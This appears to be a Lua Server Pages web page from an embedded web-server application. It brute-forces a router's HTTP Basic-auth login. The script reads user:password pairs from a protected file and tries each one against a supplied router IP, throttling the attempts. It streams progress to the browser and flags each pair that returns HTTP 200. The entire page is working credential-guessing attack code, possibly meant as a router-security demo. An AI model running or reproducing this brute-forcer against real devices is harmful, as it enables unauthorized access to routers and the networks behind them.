<html>
<head>
<script>
if(typeof parent.testingPass != "function")
{
   window.location = "/"; // Invalid use
}
function t(user,pass){ parent.testingPass(user,pass); };
function ok(user,pass){ parent.passOK(user,pass); };
function noop(){}
onload=function() { t(); }; //Signal end of importing images
</script>
</head>
<body>
<?lsp

local fmt=string.format

local function emitjs(...)
   response:write("<script>")
   response:write(...)
   response:write("</script>\n")
   response:flush()
end

local function splitPass(userPass)
   local pos = string.find(userPass, ":")
   return string.sub(userPass, 1, pos-1), string.sub(userPass, pos+1)
end

local function emitFunc(func, userPass)
   emitjs(fmt('%s("%s","%s");',func,splitPass(userPass)))
end

local data = request:data()
if data.stop then
   app.stop=true
   -- Remove default LSP headers such as Cache-Control,etc.
   response:write("stopped")
   return
end

local routerIP=data.routerIP
if not routerIP then
   response:senderror(400, "Missing IP addr")
   return
end

for i=1,10 do
   emitjs("noop();") --Trigger asynch resp by dumping some data
end 

local aio = app.io
local fp = aio:open("protected/RouterPasswd.txt","rb")
local data = fp:read("*a")
fp:close()

-- Browsers allow more than 2 connections from HTTP 1.0 responses
response:downgrade();
app.stop=false

local noOfPass=0
for pass in string.gmatch(data, "([^%s]+)") do
   noOfPass = noOfPass + 1
end
emitjs(fmt("parent.noOfPass=%d;\n",noOfPass))

local http=require"http"
local c=http.create{persistent=false}
local function httpget(pass)
   if c:request{
      url=string.format("http://%s",routerIP),
      method="GET",
      user=pass
   }
   then
      return c:status()
   end
   return nil
end

if httpget("ahdskdjeyud:e8cje9e8cjke1") == 401 then
   for pass in string.gmatch(data, "([^%s]+)") do
      if app.stop then
         break
      end
      emitFunc("t",pass)
      local status,h,d

      status=httpget()
      if status == nil then
         ba.sleep(1000); -- Router overflowed
         status = httpget()
      end
      status,h,d = httpget(pass)
      if status == nil then
         ba.sleep(1000); -- Router overflowed
         httpget()
         ba.sleep(100)
         status = httpget(pass)
      end
      if status==200 then
         emitFunc("ok",pass)
      end
      ba.sleep(100) -- So we do not overflow the router
   end
end
emitjs("t();"); -- Signal end


?>
</body>
</html>
